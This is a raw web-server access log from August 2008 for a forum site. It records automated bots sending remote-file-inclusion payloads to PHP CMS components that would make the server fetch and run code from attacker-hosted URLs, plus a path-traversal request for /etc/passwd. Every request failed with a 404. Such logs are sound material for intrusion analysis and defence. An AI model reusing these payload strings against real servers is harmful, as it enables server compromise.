193.207.106.54 - - [03/Aug/2008:17:01:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.207.106.54 - - [03/Aug/2008:17:01:17 -0700] "GET /logs/access_080121.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.207.106.54 - - [03/Aug/2008:17:01:17 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:02:01 -0700] "GET /logs/access_071231.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:02:04 -0700] "GET /logs/access_080121.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:02:06 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:02:06 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
66.135.59.180 - - [03/Aug/2008:17:02:08 -0700] "GET //include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.135.59.180 - - [03/Aug/2008:17:02:08 -0700] "GET /logs/access_080121.log//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.135.59.180 - - [03/Aug/2008:17:02:08 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:02:35 -0700] "GET //include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:02:35 -0700] "GET /logs/access_080121.log//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:02:35 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:02:42 -0700] "GET /logs/access_080121.log//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:02:43 -0700] "GET //include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:02:43 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
88.27.112.153 - - [03/Aug/2008:17:03:08 -0700] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
88.27.112.153 - - [03/Aug/2008:17:03:09 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
88.27.112.153 - - [03/Aug/2008:17:03:09 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
195.209.236.71 - - [03/Aug/2008:17:03:24 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
195.209.236.71 - - [03/Aug/2008:17:03:24 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
89.218.85.18 - - [03/Aug/2008:17:03:47 -0700] "GET /show_news.php?cutepath=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.collegiateforum.org"
89.218.85.18 - - [03/Aug/2008:17:03:47 -0700] "GET /logs/show_news.php?cutepath=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.collegiateforum.org"
216.139.67.20 - - [03/Aug/2008:17:04:51 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.collegiateforum.org"
216.139.67.20 - - [03/Aug/2008:17:04:51 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.collegiateforum.org"
69.94.30.30 - - [03/Aug/2008:17:04:51 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.collegiateforum.org"
69.94.30.30 - - [03/Aug/2008:17:04:51 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.collegiateforum.org"
64.185.237.77 - - [03/Aug/2008:17:04:54 -0700] "GET /logs//main.php?sayfa=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.77 - - [03/Aug/2008:17:04:59 -0700] "GET //main.php?sayfa=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:05:06 -0700] "GET /logs/access_080121.log/components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:05:06 -0700] "GET /components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:05:06 -0700] "GET /logs/components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
125.175.78.175 - - [03/Aug/2008:17:05:24 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
125.175.78.175 - - [03/Aug/2008:17:05:25 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
218.219.147.58 - - [03/Aug/2008:17:05:25 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.collegiateforum.org"
218.219.147.58 - - [03/Aug/2008:17:05:25 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.collegiateforum.org"
76.74.137.190 - - [03/Aug/2008:17:05:44 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.collegiateforum.org"
76.74.137.190 - - [03/Aug/2008:17:05:44 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:05:47 -0700] "GET /logs/access_071231.log/components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:08:58 -0700] "GET /logs/access_080121.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:08:58 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:08:58 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:09:24 -0700] "GET /htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:09:24 -0700] "GET /logs/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:09:30 -0700] "GET /logs/access_080121.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:09:30 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:09:30 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:10:09 -0700] "GET /logs/access_080121.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:10:09 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:17:10:10 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:17:10:29 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:17:10:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:17:10:30 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:13:01 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:13:04 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:13:49 -0700] "GET /logs/access_080121.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:13:52 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:13:52 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
65.111.37.210 - - [03/Aug/2008:17:14:40 -0700] "GET /logs/access_071231.log//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:15:34 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.77 - - [03/Aug/2008:17:15:39 -0700] "GET /logs//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.185.237.77 - - [03/Aug/2008:17:15:44 -0700] "GET //login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:15:52 -0700] "GET /logs/access_080526.log/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
125.24.4.226 - - [03/Aug/2008:17:16:38 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
125.24.4.226 - - [03/Aug/2008:17:16:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
125.24.4.226 - - [03/Aug/2008:17:16:39 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:17:43 -0700] "GET /logs/access_080616.log/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:19:48 -0700] "GET /logs/access_071231.log%20/components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
201.130.79.130 - - [03/Aug/2008:17:19:51 -0700] "GET /logs/access_080121.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
201.130.79.130 - - [03/Aug/2008:17:19:52 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
201.130.79.130 - - [03/Aug/2008:17:19:52 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
204.15.10.22 - - [03/Aug/2008:17:21:25 -0700] "GET /logs/access_080121.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
204.15.10.22 - - [03/Aug/2008:17:21:25 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
204.15.10.22 - - [03/Aug/2008:17:21:25 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:24:12 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
59.126.46.141 - - [03/Aug/2008:17:25:28 -0700] "GET /logs/scripts.log/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
59.126.46.141 - - [03/Aug/2008:17:25:30 -0700] "GET /main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
59.126.46.141 - - [03/Aug/2008:17:25:31 -0700] "GET /logs/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
218.188.33.2 - - [03/Aug/2008:17:25:51 -0700] "GET /logs/access_080121.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
218.188.33.2 - - [03/Aug/2008:17:25:51 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
218.188.33.2 - - [03/Aug/2008:17:25:52 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
125.24.4.226 - - [03/Aug/2008:17:27:02 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
87.106.191.163 - - [03/Aug/2008:17:31:20 -0700] "GET /logs/access_080121.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.163 - - [03/Aug/2008:17:31:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.163 - - [03/Aug/2008:17:31:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:33:11 -0700] "GET /logs/access_071231.log/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:33:11 -0700] "GET /lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:33:11 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
87.106.191.163 - - [03/Aug/2008:17:33:27 -0700] "GET /logs/access_071231.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:36:35 -0700] "GET /logs/access_080121.log/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:41:36 -0700] "GET /logs/access_080317.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:41:36 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:41:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
59.126.46.141 - - [03/Aug/2008:17:42:54 -0700] "GET /main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.204.226 - - [03/Aug/2008:17:43:41 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:17:44:05 -0700] "GET /logs/access_080526.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.223.15.168 - - [03/Aug/2008:17:47:56 -0700] "GET /logs/access_080121.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.223.15.168 - - [03/Aug/2008:17:47:57 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.251.8.142/dark/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.36.115.86 - - [03/Aug/2008:17:51:35 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "CazoodleBot/0.0.2 (http://www.cazoodle.com; cazoodlebot@cazoodle.com)" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:54:08 -0700] "GET /logs/access_071231.log%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:54:15 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:54:21 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:54:23 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:17:56:01 -0700] "GET /logs/access_080121.log%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:17:56:48 -0700] "GET /logs/access_071231.log/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:17:56:48 -0700] "GET /logs/access_071231.log/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:17:56:49 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:17:56:49 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:17:56:49 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
62.231.161.4 - - [03/Aug/2008:17:56:49 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
